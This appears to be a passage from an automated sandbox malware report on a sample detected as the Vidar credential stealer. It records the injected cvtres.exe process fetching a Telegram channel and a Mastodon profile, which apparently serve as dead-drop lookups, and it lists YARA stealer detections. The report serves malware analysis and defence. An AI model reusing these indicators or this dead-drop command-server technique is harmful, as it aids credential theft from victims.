                                                                  Cookie: _mastodon_session=3rSSEQhY%2BR%2ByBXGg%2FZ7vjc6lT5LBYSBRTm4v10Vjq3ue%2BjwBExu9w58N8ClT%2Bud5pLw%2FhNpc0ZVmhbGFmRwVbdBlbgslSN94eAItWDOu4CGgiK9jhd3mHMacn3wAdie7Kxd1jN1PXBqcxNNL004FuuBE8ZcXHZ9KeIX6GtzzFfvUtnGWm8ZnLLwl53QYxoy96Xw8%2BDQyXocErXsPhQdIg%2FpxcTsHw5r3GkFxULvXrHFqPB166JKLVDREPTkxqTmFOYedLa6uPEB2T4kW8V44pB5aEoVFQGo6vkNDPnAvIGvofiJ%2FGZzi5%2FYGT7rR2OuS9SAL1tKkIZTobYnVx%2Fquwbo%3D--ciXPLxNa31c7%2FJvd--PL1p0wGZ8YwXdexsQfoBoQ%3D%3D
                                                                  2022-08-05 08:50:01 UTC85INHTTP/1.1 200 OK
                                                                  Date: Fri, 05 Aug 2022 08:50:01 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Server: Mastodon
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 0
                                                                  Permissions-Policy: interest-cohort=()
                                                                  Link: <https://climatejustice.social/.well-known/webfinger?resource=acct%3Affoleg94%40climatejustice.social>; rel="lrdd"; type="application/jrd+json", <https://climatejustice.social/users/ffoleg94>; rel="alternate"; type="application/activity+json"
                                                                  Vary: Accept, Accept-Encoding, Origin
                                                                  Cache-Control: max-age=0, public
                                                                  ETag: W/"c2994c3008258a0f5f22e24f062e050b"
                                                                  Content-Security-Policy: base-uri 'none'; default-src 'none'; frame-ancestors 'none'; font-src 'self' https://climatejustice.social; img-src 'self' https: data: blob: https://climatejustice.social; style-src 'self' https://climatejustice.social 'nonce-dLglWmkK2DXilNlj6PAYsA=='; media-src 'self' https: data: https://climatejustice.social; frame-src 'self' https:; manifest-src 'self' https://climatejustice.social; connect-src 'self' data: blob: https://climatejustice.social https://climatejustice.social wss://climatejustice.social; script-src 'self' https://climatejustice.social; child-src 'self' blob: https://climatejustice.social; worker-src 'self' blob: https://climatejustice.social
                                                                  Set-Cookie: _mastodon_session=cBV6gswXNvy8Hgb%2BvExlczZjstftQa27zJ%2ByonVRi5vw9q44kYaXOHqqk%2FMhqSyxc2K1n3IXUv4kERfPbDEZOwE6NFx%2BLntMjgu1MWeXu90ji40Xeo7Tz0u9MgjPeSND%2BppXUEiqV%2Bou0NkQvBHoflX27u%2BLD6qQzJ6oEhtEEA7VVKadgTfzBP2a0zRCmF4SsemcSDzT8BNNzs1M%2BIr4CTeavXuTu%2BJCm0uuMkUySIWpjXI2ILBRTS6oqhKWITt4DN8y09XOU2uhmLZARu%2BXQUXiFg8MhEuyus2jpZ3LM2BaLgmhu4lCR67q728X8Wn%2Bl%2FdyVOgV5qfUpjC%2F2Xeeaxs%3D--9MBRf%2FPU0zFwfS96--LxGMiLJEI8rWcXno6EKaag%3D%3D; path=/; HttpOnly; SameSite=Lax; secure
                                                                  X-Request-Id: 40155b8a-7a1e-4660-9353-f1d8198128fe
                                                                  X-Runtime: 0.101000
                                                                  Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                  X-Cached: MISS
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  2022-08-05 08:50:01 UTC87INData Raw: 36 35 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 27 20 72 65 6c 3d 27 69 63 6f 6e 27 20 74 79 70 65 3d 27 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 27 20 72 65 6c 3d 27 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 27 20 73
                                                                  Data Ascii: 6550<!DOCTYPE html><html lang='en'><head><meta charset='utf-8'><meta content='width=device-width, initial-scale=1' name='viewport'><link href='/favicon.ico' rel='icon' type='image/x-icon'><link href='/apple-touch-icon.png' rel='apple-touch-icon' s
                                                                  2022-08-05 08:50:01 UTC101INData Raw: 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 2e 67 6c 6f 62 61 6c 3c 2f 61 3e 0d 0a 66 6f 72 20 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 20 67 72 6f 75 70 73 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 75 6e 6b 2e 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 2e 67 6c 6f 62 61 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 66 75 6e 6b 2e 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 2e 67 6c 6f 62 61 6c 3c 2f 61 3e 0d 0a 66 6f 72 20 70 6f 64 63 61 73 74 73 20 61 6e 64 20 6d 75 73 69 63 0d 0a 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 27 65 6e 64 6f 72 73 65 6d 65 6e 74 73 2d 77 69 64 67 65 74 20 74 72 65 6e 64 73 2d 77 69 64
                                                                  Data Ascii: target="_blank">climatejustice.global</a>for climatejustice groups<a href="https://funk.climatejustice.global" target="_blank">funk.climatejustice.global</a>for podcasts and music</span></p></div></div><div class='endorsements-widget trends-wid


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  6192.168.2.749801149.154.167.99443C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-08-05 08:50:22 UTC112OUTGET /korstonsales HTTP/1.1
                                                                  Host: t.me
                                                                  Cookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
                                                                  2022-08-05 08:50:22 UTC112INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 05 Aug 2022 08:50:22 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 9636
                                                                  Connection: close
                                                                  Pragma: no-cache
                                                                  Cache-control: no-store
                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                  Strict-Transport-Security: max-age=35768000
                                                                  2022-08-05 08:50:22 UTC113INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 6f 72 73 74 6f 6e 73 61 6c 65 73 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e
                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @korstonsales</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  7192.168.2.749802167.86.107.75443C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-08-05 08:50:22 UTC122OUTGET /@ffoleg94 HTTP/1.1
                                                                  Host: climatejustice.social
                                                                  Cookie: _mastodon_session=cBV6gswXNvy8Hgb%2BvExlczZjstftQa27zJ%2ByonVRi5vw9q44kYaXOHqqk%2FMhqSyxc2K1n3IXUv4kERfPbDEZOwE6NFx%2BLntMjgu1MWeXu90ji40Xeo7Tz0u9MgjPeSND%2BppXUEiqV%2Bou0NkQvBHoflX27u%2BLD6qQzJ6oEhtEEA7VVKadgTfzBP2a0zRCmF4SsemcSDzT8BNNzs1M%2BIr4CTeavXuTu%2BJCm0uuMkUySIWpjXI2ILBRTS6oqhKWITt4DN8y09XOU2uhmLZARu%2BXQUXiFg8MhEuyus2jpZ3LM2BaLgmhu4lCR67q728X8Wn%2Bl%2FdyVOgV5qfUpjC%2F2Xeeaxs%3D--9MBRf%2FPU0zFwfS96--LxGMiLJEI8rWcXno6EKaag%3D%3D
                                                                  2022-08-05 08:50:22 UTC123INHTTP/1.1 200 OK
                                                                  Date: Fri, 05 Aug 2022 08:50:22 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Server: Mastodon
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 0
                                                                  Permissions-Policy: interest-cohort=()
                                                                  Link: <https://climatejustice.social/.well-known/webfinger?resource=acct%3Affoleg94%40climatejustice.social>; rel="lrdd"; type="application/jrd+json", <https://climatejustice.social/users/ffoleg94>; rel="alternate"; type="application/activity+json"
                                                                  Vary: Accept, Accept-Encoding, Origin
                                                                  Cache-Control: max-age=0, public
                                                                  ETag: W/"32c8b9e673b4aaa051f347271f6bf081"
                                                                  Content-Security-Policy: base-uri 'none'; default-src 'none'; frame-ancestors 'none'; font-src 'self' https://climatejustice.social; img-src 'self' https: data: blob: https://climatejustice.social; style-src 'self' https://climatejustice.social 'nonce-HrEcTrDQt0VOPhA9Duc+Vw=='; media-src 'self' https: data: https://climatejustice.social; frame-src 'self' https:; manifest-src 'self' https://climatejustice.social; connect-src 'self' data: blob: https://climatejustice.social https://climatejustice.social wss://climatejustice.social; script-src 'self' https://climatejustice.social; child-src 'self' blob: https://climatejustice.social; worker-src 'self' blob: https://climatejustice.social
                                                                  Set-Cookie: _mastodon_session=odijTynxlktrze7IgYOSVyYGax6MLuq%2BHgXXNKVkWj0EmP%2BY%2BYajeG%2F8FkitzpankLQzKOs7zUEdBhjbxOzpdZ1RpsOQGZ1AUSKbXvelp9WMXNXnJ654jBiZtol1X4q0pNgUdviAwoWtj%2FRytZuF3icv9tA2rrhSHuj8RNt7upfkwzVVGdrp1OipqNMvxNGxOGsFr55qZoPRd7OunaK4YDlwg%2Bc1dFbtqJ%2FwmLTyaTlwPgipiHfY3D96mosQe3LYewtprF6rsACbNZQUOPaPNuvOAKe1MffUWL9jfeHvRGne%2Frrk4sQKfhRHzSDToiAhNgEMrluTU%2FqXba1%2FBYcmyoU%3D--bxICJGAgGqamQv1Z--NCklHYqUpYEpY8rfNxpO7g%3D%3D; path=/; HttpOnly; SameSite=Lax; secure
                                                                  X-Request-Id: 5a371a80-1412-4305-80b6-62f3908a4fec
                                                                  X-Runtime: 0.068325
                                                                  Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                  X-Cached: MISS
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  2022-08-05 08:50:22 UTC125INData Raw: 36 35 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 27 20 72 65 6c 3d 27 69 63 6f 6e 27 20 74 79 70 65 3d 27 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 27 20 72 65 6c 3d 27 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 27 20 73
                                                                  Data Ascii: 6550<!DOCTYPE html><html lang='en'><head><meta charset='utf-8'><meta content='width=device-width, initial-scale=1' name='viewport'><link href='/favicon.ico' rel='icon' type='image/x-icon'><link href='/apple-touch-icon.png' rel='apple-touch-icon' s
                                                                  2022-08-05 08:50:22 UTC139INData Raw: 5f 62 6c 61 6e 6b 22 3e 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 2e 67 6c 6f 62 61 6c 3c 2f 61 3e 0d 0a 66 6f 72 20 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 20 67 72 6f 75 70 73 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 75 6e 6b 2e 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 2e 67 6c 6f 62 61 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 66 75 6e 6b 2e 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 2e 67 6c 6f 62 61 6c 3c 2f 61 3e 0d 0a 66 6f 72 20 70 6f 64 63 61 73 74 73 20 61 6e 64 20 6d 75 73 69 63 0d 0a 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 27 65 6e 64 6f 72 73 65 6d 65 6e 74 73 2d 77 69 64 67 65 74 20 74 72 65 6e 64 73 2d 77 69 64 67 65 74 27 3e 0a 3c 68
                                                                  Data Ascii: _blank">climatejustice.global</a>for climatejustice groups<a href="https://funk.climatejustice.global" target="_blank">funk.climatejustice.global</a>for podcasts and music</span></p></div></div><div class='endorsements-widget trends-widget'><h


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  8192.168.2.749854149.154.167.99443C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-08-05 08:50:44 UTC150OUTGET /korstonsales HTTP/1.1
                                                                  Host: t.me
                                                                  Cookie: stel_ssid=81a92d177cf1bdddf7_18201360474548186560
                                                                  2022-08-05 08:50:44 UTC150INHTTP/1.1 200 OK
                                                                  Server: nginx/1.18.0
                                                                  Date: Fri, 05 Aug 2022 08:50:44 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Content-Length: 9636
                                                                  Connection: close
                                                                  Pragma: no-cache
                                                                  Cache-control: no-store
                                                                  X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                  Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                  Strict-Transport-Security: max-age=35768000
                                                                  2022-08-05 08:50:44 UTC150INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 6b 6f 72 73 74 6f 6e 73 61 6c 65 73 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e
                                                                  Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @korstonsales</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.


                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                  9192.168.2.749855167.86.107.75443C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  TimestampkBytes transferredDirectionData
                                                                  2022-08-05 08:50:44 UTC160OUTGET /@ffoleg94 HTTP/1.1
                                                                  Host: climatejustice.social
                                                                  Cookie: _mastodon_session=odijTynxlktrze7IgYOSVyYGax6MLuq%2BHgXXNKVkWj0EmP%2BY%2BYajeG%2F8FkitzpankLQzKOs7zUEdBhjbxOzpdZ1RpsOQGZ1AUSKbXvelp9WMXNXnJ654jBiZtol1X4q0pNgUdviAwoWtj%2FRytZuF3icv9tA2rrhSHuj8RNt7upfkwzVVGdrp1OipqNMvxNGxOGsFr55qZoPRd7OunaK4YDlwg%2Bc1dFbtqJ%2FwmLTyaTlwPgipiHfY3D96mosQe3LYewtprF6rsACbNZQUOPaPNuvOAKe1MffUWL9jfeHvRGne%2Frrk4sQKfhRHzSDToiAhNgEMrluTU%2FqXba1%2FBYcmyoU%3D--bxICJGAgGqamQv1Z--NCklHYqUpYEpY8rfNxpO7g%3D%3D
                                                                  2022-08-05 08:50:44 UTC160INHTTP/1.1 200 OK
                                                                  Date: Fri, 05 Aug 2022 08:50:44 GMT
                                                                  Content-Type: text/html; charset=utf-8
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  Vary: Accept-Encoding
                                                                  Server: Mastodon
                                                                  X-Frame-Options: DENY
                                                                  X-Content-Type-Options: nosniff
                                                                  X-XSS-Protection: 0
                                                                  Permissions-Policy: interest-cohort=()
                                                                  Link: <https://climatejustice.social/.well-known/webfinger?resource=acct%3Affoleg94%40climatejustice.social>; rel="lrdd"; type="application/jrd+json", <https://climatejustice.social/users/ffoleg94>; rel="alternate"; type="application/activity+json"
                                                                  Vary: Accept, Accept-Encoding, Origin
                                                                  Cache-Control: max-age=0, public
                                                                  ETag: W/"caf4cc37237e7fc1bf6428a925b5bae0"
                                                                  Content-Security-Policy: base-uri 'none'; default-src 'none'; frame-ancestors 'none'; font-src 'self' https://climatejustice.social; img-src 'self' https: data: blob: https://climatejustice.social; style-src 'self' https://climatejustice.social 'nonce-i/lixRy9GKJYqoH2UuhdCg=='; media-src 'self' https: data: https://climatejustice.social; frame-src 'self' https:; manifest-src 'self' https://climatejustice.social; connect-src 'self' data: blob: https://climatejustice.social https://climatejustice.social wss://climatejustice.social; script-src 'self' https://climatejustice.social; child-src 'self' blob: https://climatejustice.social; worker-src 'self' blob: https://climatejustice.social
                                                                  Set-Cookie: _mastodon_session=G8wdgwz%2FDemSpy0Da1ZLqVdSh5XC%2FhOntkD9%2FioEKONmGFQbKw3ZbiJ4RIMQvyl5QKxN%2FpcDH0nKadQ0yXDwXyz6yqDcLvbVjYrc1VwLIggpvLXohspOLTi9YyRFkDXD1U6%2Fzrzrb4LoA5rAsIFcowDfc23g9dzpYcSLczI6VlHA0lfP8JjHOwarQxEdzM6akhIz0PxsXrVBHQQArBfIyixEHqMzgVy%2FgvPIRcQ2qdVLKMgTPmDwVbQ0%2BqoNguC6M%2F7xjoKMMQknPlrQIslHVR5u8qBY9lIeeNK373jl%2B82kCofXgGW%2BvK4Vwx2GKefGraC9M1B%2Bz7G9H6WpaKFziTw%3D--Ffkg6BiJ3LNw7A7D--YyCOAf66iro8NmL254gNlw%3D%3D; path=/; HttpOnly; SameSite=Lax; secure
                                                                  X-Request-Id: fb01facc-65ef-4503-9b0d-12323d7b4f20
                                                                  X-Runtime: 0.060382
                                                                  Strict-Transport-Security: max-age=63072000; includeSubDomains
                                                                  X-Cached: MISS
                                                                  Strict-Transport-Security: max-age=31536000
                                                                  2022-08-05 08:50:44 UTC162INData Raw: 36 35 35 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 27 20 72 65 6c 3d 27 69 63 6f 6e 27 20 74 79 70 65 3d 27 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 27 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 2e 70 6e 67 27 20 72 65 6c 3d 27 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 27 20 73
                                                                  Data Ascii: 6550<!DOCTYPE html><html lang='en'><head><meta charset='utf-8'><meta content='width=device-width, initial-scale=1' name='viewport'><link href='/favicon.ico' rel='icon' type='image/x-icon'><link href='/apple-touch-icon.png' rel='apple-touch-icon' s
                                                                  2022-08-05 08:50:44 UTC176INData Raw: 3d 22 5f 62 6c 61 6e 6b 22 3e 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 2e 67 6c 6f 62 61 6c 3c 2f 61 3e 0d 0a 66 6f 72 20 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 20 67 72 6f 75 70 73 0d 0a 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 75 6e 6b 2e 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 2e 67 6c 6f 62 61 6c 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 66 75 6e 6b 2e 63 6c 69 6d 61 74 65 6a 75 73 74 69 63 65 2e 67 6c 6f 62 61 6c 3c 2f 61 3e 0d 0a 66 6f 72 20 70 6f 64 63 61 73 74 73 20 61 6e 64 20 6d 75 73 69 63 0d 0a 3c 2f 73 70 61 6e 3e 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 27 65 6e 64 6f 72 73 65 6d 65 6e 74 73 2d 77 69 64 67 65 74 20 74 72 65 6e 64 73 2d 77 69 64 67 65 74 27 3e 0a
                                                                  Data Ascii: ="_blank">climatejustice.global</a>for climatejustice groups<a href="https://funk.climatejustice.global" target="_blank">funk.climatejustice.global</a>for podcasts and music</span></p></div></div><div class='endorsements-widget trends-widget'>


                                                                  Statistics

                                                                  CPU Usage

                                                                  Click to jump to process

                                                                  Memory Usage

                                                                  Click to jump to process

                                                                  High Level Behavior Distribution

                                                                  Click to dive into process behavior distribution

                                                                  Behavior

                                                                  Click to jump to process

                                                                  System Behavior

                                                                  General

                                                                  Target ID:0
                                                                  Start time:10:49:10
                                                                  Start date:05/08/2022
                                                                  Path:C:\Users\user\Desktop\uGfpJynSWM.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:"C:\Users\user\Desktop\uGfpJynSWM.exe"
                                                                  Imagebase:0x830000
                                                                  File size:374960 bytes
                                                                  MD5 hash:EB84AEEF20EA974BF207DD6DF8446567
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000000.00000002.336204598.0000000002BEF000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.336360720.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000000.00000002.336360720.0000000003BE1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                  Reputation:low

                                                                  General

                                                                  Target ID:1
                                                                  Start time:10:49:12
                                                                  Start date:05/08/2022
                                                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                  Imagebase:0xb0000
                                                                  File size:43176 bytes
                                                                  MD5 hash:C09985AE74F0882F208D75DE27770DFA
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000001.00000000.334513678.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000000.334068069.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000001.00000000.334068069.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000000.333395548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000001.00000000.333395548.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000000.333726198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                  • Rule: Windows_Trojan_Vidar_114258d5, Description: unknown, Source: 00000001.00000000.333726198.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.594144374.0000000004C97000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                  Reputation:moderate

                                                                  Disassembly

                                                                  Reset < >

                                                                    Execution Graph

                                                                    Execution Coverage:23.9%
                                                                    Dynamic/Decrypted Code Coverage:100%
                                                                    Signature Coverage:26.5%
                                                                    Total number of Nodes:113
                                                                    Total number of Limit Nodes:5
